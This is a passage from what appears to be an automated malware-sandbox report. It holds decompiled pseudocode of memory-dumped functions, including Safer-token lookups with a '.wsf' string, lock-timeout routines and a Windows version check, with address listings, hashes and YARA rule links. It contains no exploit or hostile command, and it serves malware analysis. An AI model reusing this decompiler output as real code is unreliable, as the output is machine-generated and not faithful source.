						L34:
						_t95 = E00B9059B(_t90);
						L10:
						if(_t95 < 0) {
							goto L18;
						}
						_t62 = E00B8267D(_t99, _v532);
						goto L12;
					}
					_t95 = E00B84BA1(_t90, _t95);
					if(_t95 == 1) {
						_push(_v532);
						_t90 = _t99;
						goto L34;
					}
					goto L10;
				}
			}




































                                                        0x00b81f26
                                                        0x00b81f31
                                                        0x00b81f38
                                                        0x00b81f3e
                                                        0x00b81f45
                                                        0x00b81f4d
                                                        0x00b81f51
                                                        0x00b81f57
                                                        0x00b81f5a
                                                        0x00b81f67
                                                        0x00b81f6f
                                                        0x00b81f76
                                                        0x00b888f3
                                                        0x00b888f3
                                                        0x00b888f6
                                                        0x00b88906
                                                        0x00b88938
                                                        0x00b88938
                                                        0x00b82048
                                                        0x00b8204a
                                                        0x00b86bd8
                                                        0x00b86bd8
                                                        0x00b86bde
                                                        0x00b8898c
                                                        0x00b88992
                                                        0x00000000
                                                        0x00000000
                                                        0x00b88998
                                                        0x00b88998
                                                        0x00b889ae
                                                        0x00000000
                                                        0x00b889ae
                                                        0x00b86be4
                                                        0x00b82050
                                                        0x00b82050
                                                        0x00b82058
                                                        0x00b86bd0
                                                        0x00b86bd0
                                                        0x00b82064
                                                        0x00b8206f
                                                        0x00b8207a
                                                        0x00b8207a
                                                        0x00b81f90
                                                        0x00b81f97
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81f9d
                                                        0x00b81faa
                                                        0x00b81fac
                                                        0x00b81fb4
                                                        0x00b8890a
                                                        0x00b8890a
                                                        0x00000000
                                                        0x00b8890a
                                                        0x00b81fc0
                                                        0x00b81fc2
                                                        0x00b81fca
                                                        0x00000000
                                                        0x00000000
                                                        0x00b81fd8
                                                        0x00b81fdc
                                                        0x00b86d9f
                                                        0x00b86da5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86db8
                                                        0x00b86dba
                                                        0x00b86dbc
                                                        0x00b88964
                                                        0x00b8896a
                                                        0x00b88977
                                                        0x00b88977
                                                        0x00b8897f
                                                        0x00b88982
                                                        0x00b8203c
                                                        0x00b8203c
                                                        0x00b82040
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82046
                                                        0x00000000
                                                        0x00b82046
                                                        0x00b86dca
                                                        0x00b86dcf
                                                        0x00b86dd1
                                                        0x00b88971
                                                        0x00b88972
                                                        0x00000000
                                                        0x00b88972
                                                        0x00b86dd7
                                                        0x00b86ddd
                                                        0x00b86ddf
                                                        0x00b88956
                                                        0x00b8895c
                                                        0x00b86e03
                                                        0x00b86e11
                                                        0x00000000
                                                        0x00b86e11
                                                        0x00b86df9
                                                        0x00b86dfb
                                                        0x00b86dfd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b86dfd
                                                        0x00b81fe2
                                                        0x00b81fef
                                                        0x00b81ff1
                                                        0x00b81ff2
                                                        0x00b88914
                                                        0x00b8891a
                                                        0x00b81ff8
                                                        0x00b81ff8
                                                        0x00b81ff8
                                                        0x00b81fff
                                                        0x00b88924
                                                        0x00b88929
                                                        0x00b8892b
                                                        0x00b8892b
                                                        0x00b88933
                                                        0x00000000
                                                        0x00b82005
                                                        0x00b82009
                                                        0x00b8200f
                                                        0x00b82011
                                                        0x00b88947
                                                        0x00b8894c
                                                        0x00b82027
                                                        0x00b82029
                                                        0x00000000
                                                        0x00000000
                                                        0x00b82037
                                                        0x00000000
                                                        0x00b82037
                                                        0x00b8201c
                                                        0x00b82021
                                                        0x00b8893f
                                                        0x00b88945
                                                        0x00000000
                                                        0x00b88945
                                                        0x00000000
                                                        0x00b82021

                                                        APIs
                                                          • Part of subcall function 00B83B1E: GetFullPathNameW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00B83B4F
                                                        • SysAllocString.OLEAUT32(?), ref: 00B81FAA
                                                        • SysAllocString.OLEAUT32(?), ref: 00B81FC0
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferIdentifyLevel,00000000,advapi32.dll,?,?,?), ref: 00B84C1A
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferComputeTokenFromLevel,?,?), ref: 00B84C32
                                                          • Part of subcall function 00B84BA1: GetProcAddress.KERNEL32(?,SaferCloseLevel,?,?), ref: 00B84C4A
                                                          • Part of subcall function 00B84BA1: memset.MSVCRT ref: 00B84C6A
                                                          • Part of subcall function 00B84BA1: memset.MSVCRT ref: 00B84C99
                                                        • SysFreeString.OLEAUT32(00000000), ref: 00B82064
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: AddressProcString$Allocmemset$FreeFullNamePath
                                                        • String ID: .wsf
                                                        • API String ID: 3996831049-2429851548
                                                        • Opcode ID: 5239ae02220101a6457966414b048ee6458a16183bf1f2c0f805c7fddd3870d2
                                                        • Instruction ID: 5d5f6b00295f50f7a0b10985e5684e63c65247e327bb7f6f52e2e1cfcf100475
                                                        • Opcode Fuzzy Hash: 5239ae02220101a6457966414b048ee6458a16183bf1f2c0f805c7fddd3870d2
                                                        • Instruction Fuzzy Hash: A551A3356402199BCB21BB28CC85BAE77EAAF94714F6004E9E41AE7271DF34DE41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022F53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 44%
                                                        			E022F53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x023b01c0;
									_push(_t92);
									_push(0);
									_t37 = E022CF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02314FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02323F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02323F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0235217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02323F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02313915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E022F5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E022CF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02313915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E022CF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02313915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E022CF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02313915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E022F5329(_t74, _t92);
													_push(1);
													return E022F53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                        0x022f53ab
                                                        0x022f53ae
                                                        0x022f53b1
                                                        0x022f53b4
                                                        0x022f53b7
                                                        0x023105b6
                                                        0x023105c0
                                                        0x023105c3
                                                        0x00000000
                                                        0x023105c9
                                                        0x023105c9
                                                        0x023105cc
                                                        0x023105d5
                                                        0x023105d5
                                                        0x022f53bd
                                                        0x022f53bd
                                                        0x022f53bd
                                                        0x022f53be
                                                        0x022f53be
                                                        0x022f53be
                                                        0x022f53c0
                                                        0x00000000
                                                        0x00000000
                                                        0x02332269
                                                        0x0233226d
                                                        0x02332349
                                                        0x0233234d
                                                        0x02332273
                                                        0x02332276
                                                        0x02332279
                                                        0x0233227e
                                                        0x02332283
                                                        0x02332287
                                                        0x0233228a
                                                        0x0233228d
                                                        0x0233228f
                                                        0x023322bc
                                                        0x023322bc
                                                        0x023322bc
                                                        0x023322be
                                                        0x023322c4
                                                        0x023322cc
                                                        0x023322d0
                                                        0x023322d6
                                                        0x023322d7
                                                        0x023322da
                                                        0x023322df
                                                        0x023322e4
                                                        0x00000000
                                                        0x00000000
                                                        0x023322e6
                                                        0x023322e9
                                                        0x023322f4
                                                        0x023322f9
                                                        0x023322fa
                                                        0x02332305
                                                        0x02332314
                                                        0x02332319
                                                        0x0233231a
                                                        0x0233231d
                                                        0x02332320
                                                        0x02332323
                                                        0x02332323
                                                        0x02332328
                                                        0x0233232d
                                                        0x0233232f
                                                        0x02332331
                                                        0x02332336
                                                        0x02332336
                                                        0x0233233b
                                                        0x0233233d
                                                        0x02332350
                                                        0x02332351
                                                        0x02332356
                                                        0x02332359
                                                        0x02332359
                                                        0x0233235b
                                                        0x0233235d
                                                        0x022f5367
                                                        0x022f536b
                                                        0x022f5372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x02332363
                                                        0x02332363
                                                        0x02332369
                                                        0x0233236a
                                                        0x0233236c
                                                        0x02332371
                                                        0x02332373
                                                        0x00000000
                                                        0x02332379
                                                        0x02332379
                                                        0x0233237a
                                                        0x0233237f
                                                        0x0233237f
                                                        0x02332385
                                                        0x02332386
                                                        0x02332389
                                                        0x0233238e
                                                        0x02332390
                                                        0x022f5378
                                                        0x022f537c
                                                        0x02332396
                                                        0x02332396
                                                        0x02332397
                                                        0x0233239c
                                                        0x023323a2
                                                        0x023323a3
                                                        0x023323a6
                                                        0x023323ab
                                                        0x023323ad
                                                        0x00000000
                                                        0x023323b3
                                                        0x023323b3
                                                        0x023323b4
                                                        0x023323b9
                                                        0x023323ba
                                                        0x023323ba
                                                        0x023323bc
                                                        0x023323bf
                                                        0x00000000
                                                        0x00000000
                                                        0x02329153
                                                        0x02329158
                                                        0x0232915a
                                                        0x0232915e
                                                        0x02329160
                                                        0x00000000
                                                        0x02329166
                                                        0x02329166
                                                        0x02329171
                                                        0x02329176
                                                        0x02329176
                                                        0x00000000
                                                        0x02329160
                                                        0x023323c6
                                                        0x023323cb
                                                        0x023323d7
                                                        0x023323d7
                                                        0x023323ad
                                                        0x02332390
                                                        0x02332373
                                                        0x0233233f
                                                        0x0233233f
                                                        0x00000000
                                                        0x0233233f
                                                        0x02332291
                                                        0x02332291
                                                        0x02332293
                                                        0x02332295
                                                        0x0233229a
                                                        0x023322a1
                                                        0x023322a3
                                                        0x023322a7
                                                        0x023322a9
                                                        0x00000000
                                                        0x00000000
                                                        0x023322ab
                                                        0x023322ad
                                                        0x023322af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322af
                                                        0x023322b1
                                                        0x023322b4
                                                        0x023322b4
                                                        0x023322b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x023322b6
                                                        0x0233228f
                                                        0x00000000
                                                        0x0233226d
                                                        0x022f53cb
                                                        0x022f53ce
                                                        0x022f53d0
                                                        0x022f53d4
                                                        0x022f53d6
                                                        0x00000000
                                                        0x022f53d8
                                                        0x022f53e3
                                                        0x022f53ea
                                                        0x022f53ea
                                                        0x022f53d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023322F4
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 0233230B
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 023322FC
                                                        • RTL: Re-Waiting, xrefs: 02332328
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 2219edf6fd7d5631e7d5e4618142f02fec57bc7692ec64fea9c96993396cfbc4
                                                        • Instruction ID: 1ceaea33396837ee4da27f56cad2ea8d6f968cb75a91d2e3a1dcab2442f1db71
                                                        • Opcode Fuzzy Hash: 2219edf6fd7d5631e7d5e4618142f02fec57bc7692ec64fea9c96993396cfbc4
                                                        • Instruction Fuzzy Hash: 935108716107156BEB25DB69DC80FA773AAAF44324F114229FE05DF244E771E9418BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 022FEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 51%
                                                        			E022FEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E022EDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x23b793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E022D16C0(_t39);
				} else {
					_t40 = E022CF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02313915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E022D01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x23b793c; // 0x0
								_push(_t85);
								_t44 = E022D1F28(_t71);
							} else {
								_t44 = E022CF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02313915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E02352306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E022FEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02314FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02323F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02323F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x23b20c0;
								if(_t85 != 0x23b20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E0235217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02323F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                        0x022fec56
                                                        0x022fec56
                                                        0x022fec56
                                                        0x022fec5c
                                                        0x022fec64
                                                        0x023323e6
                                                        0x023323eb
                                                        0x023323eb
                                                        0x022fec6a
                                                        0x022fec6c
                                                        0x022fec6f
                                                        0x023323f3
                                                        0x023323f8
                                                        0x023323fa
                                                        0x023323fc
                                                        0x022fec75
                                                        0x022fec76
                                                        0x022fec76
                                                        0x022fec7b
                                                        0x022fec7c
                                                        0x022fec7e
                                                        0x02332406
                                                        0x02332407
                                                        0x0233240c
                                                        0x0233240d
                                                        0x0233240d
                                                        0x0233240d
                                                        0x02332414
                                                        0x02332417
                                                        0x0233241e
                                                        0x02332435
                                                        0x02332438
                                                        0x0233243c
                                                        0x0233243f
                                                        0x02332442
                                                        0x02332443
                                                        0x02332446
                                                        0x02332449
                                                        0x02332453
                                                        0x02332455
                                                        0x0233245b
                                                        0x0233245b
                                                        0x022feb99
                                                        0x022feb99
                                                        0x022feb9c
                                                        0x022feb9d
                                                        0x022feb9f
                                                        0x022feba2
                                                        0x02332465
                                                        0x0233246b
                                                        0x0233246d
                                                        0x022feba8
                                                        0x022feba9
                                                        0x022feba9
                                                        0x022febae
                                                        0x022febb3
                                                        0x022febb9
                                                        0x022febbb
                                                        0x02332513
                                                        0x02332514
                                                        0x02332519
                                                        0x0233251b
                                                        0x022fec2a
                                                        0x022fec2d
                                                        0x022fec33
                                                        0x022fec36
                                                        0x022fec3a
                                                        0x022fec3e
                                                        0x022fec40
                                                        0x022fec47
                                                        0x022fec47
                                                        0x022fec40
                                                        0x022d22c6
                                                        0x022febc1
                                                        0x022febc1
                                                        0x022febc5
                                                        0x022fec9a
                                                        0x022fec9a
                                                        0x022febd6
                                                        0x022febd6
                                                        0x00000000
                                                        0x022febbb
                                                        0x02332477
                                                        0x0233247c
                                                        0x02332486
                                                        0x0233248b
                                                        0x02332496
                                                        0x0233249b
                                                        0x0233249d
                                                        0x023324a0
                                                        0x023324a3
                                                        0x023324aa
                                                        0x023324aa
                                                        0x023324a5
                                                        0x023324a5
                                                        0x023324a5
                                                        0x023324ac
                                                        0x023324af
                                                        0x023324b0
                                                        0x023324b3
                                                        0x023324b9
                                                        0x023324ba
                                                        0x023324bb
                                                        0x023324c6
                                                        0x023324cb
                                                        0x023324cd
                                                        0x023324d0
                                                        0x023324d1
                                                        0x023324d4
                                                        0x023324d6
                                                        0x023324d9
                                                        0x023324d9
                                                        0x023324dc
                                                        0x023324df
                                                        0x023324e1
                                                        0x023324e7
                                                        0x023324e9
                                                        0x023324ec
                                                        0x023324ef
                                                        0x023324f2
                                                        0x023324f2
                                                        0x023324ef
                                                        0x023324e7
                                                        0x023324fa
                                                        0x023324ff
                                                        0x02332501
                                                        0x02332503
                                                        0x02332506
                                                        0x0233250b
                                                        0x022feb8c
                                                        0x022feb93
                                                        0x00000000
                                                        0x00000000
                                                        0x022feb93
                                                        0x00000000
                                                        0x022feb99
                                                        0x022fec85
                                                        0x022fec85
                                                        0x022fec85
                                                        0x00000000

                                                        Strings
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 023324BD
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0233248D
                                                        • RTL: Re-Waiting, xrefs: 023324FA
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.688194486.00000000022C0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: true
                                                        • Associated: 0000000D.00000002.688187161.00000000022B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688305042.00000000023A0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688312609.00000000023B0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688320304.00000000023B4000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688327822.00000000023B7000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688335301.00000000023C0000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.688370384.0000000002420000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: c6bb0dcfde3381e48d528e6d901b60ec22d5a48132e85671a14dcee5894f7992
                                                        • Instruction ID: 14ccf73c15144de93f704d5611bc1767cfe3f318f6f50ff7c3b5f35ea9b68c40
                                                        • Opcode Fuzzy Hash: c6bb0dcfde3381e48d528e6d901b60ec22d5a48132e85671a14dcee5894f7992
                                                        • Instruction Fuzzy Hash: 3441F470610304ABDB21DFA8CD85F6B77BAEF44720F108615FA699B2D4D774EA41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9407D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B9407D() {
				signed int _v8;
				short _v16;
				struct _OSVERSIONINFOW _v292;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t20;
				void* _t27;
				intOrPtr _t30;
				void* _t31;
				void* _t35;
				void* _t38;
				void* _t40;
				signed int _t43;
				signed int _t46;

				_t18 =  *0xb97004; // 0xbb40e64e
				_v8 = _t18 ^ _t43;
				_t46 =  *0xb974c8; // 0x0
				if(_t46 != 0) {
					L23:
					_t20 =  *0xb974c8; // 0x0
					return E00B81335(_t20, _t35, _v8 ^ _t43, _t38, 0, _t40);
				} else {
					_push(_t40);
					memset( &_v292, 0, 0x11c);
					_v292.dwOSVersionInfoSize = 0x11c;
					if(GetVersionExW( &_v292) == 0) {
						_v292.dwOSVersionInfoSize = 0x114;
						GetVersionExW( &_v292);
					}
					_t27 = _v292.dwPlatformId - 1;
					 *0xb974c8 = 0;
					_pop(_t40);
					if(_t27 == 0) {
						L18:
						if(_v292.dwMajorVersion == 4 && (_v292.dwMinorVersion == 0 || _v292.dwMinorVersion == 0xa || _v292.dwMinorVersion == 0x5a)) {
							 *0xb974c8 = 1;
						}
						goto L23;
					}
					if(_t27 != 1) {
						goto L23;
					}
					if(_v292.dwMajorVersion != 5) {
						if(_v292.dwMajorVersion > 4) {
							 *0xb974c8 = 0x20;
							goto L23;
						}
						 *0xb974c8 = 2;
						goto L18;
					}
					_t30 = _v292.dwMinorVersion;
					if(_t30 == 0) {
						 *0xb974c8 = 4;
						goto L23;
					}
					_t31 = _t30 - 1;
					if(_t31 == 0) {
						if(_v16 >= 2) {
							 *0xb974c8 = 8;
						}
						L12:
						 *0xb974c8 =  *0xb974c8 | 0x00000004;
						goto L23;
					}
					if(_t31 == 1) {
						if(_v16 >= 1) {
							 *0xb974c8 = 0x10;
						}
						goto L12;
					}
					 *0xb974c8 = 0x14;
					goto L23;
				}
			}


















                                                        0x00b94088
                                                        0x00b9408f
                                                        0x00b94095
                                                        0x00b9409b
                                                        0x00b94199
                                                        0x00b9419c
                                                        0x00b941aa
                                                        0x00b940a1
                                                        0x00b940a1
                                                        0x00b940b0
                                                        0x00b940be
                                                        0x00b940cf
                                                        0x00b940d8
                                                        0x00b940e2
                                                        0x00b940e2
                                                        0x00b940ea
                                                        0x00b940eb
                                                        0x00b940f1
                                                        0x00b940f2
                                                        0x00b9416c
                                                        0x00b94173
                                                        0x00b9418f
                                                        0x00b9418f
                                                        0x00000000
                                                        0x00b94173
                                                        0x00b940f5
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94102
                                                        0x00b94160
                                                        0x00b941ab
                                                        0x00000000
                                                        0x00b941ab
                                                        0x00b94162
                                                        0x00000000
                                                        0x00b94162
                                                        0x00b9410a
                                                        0x00b9410c
                                                        0x00b9414d
                                                        0x00000000
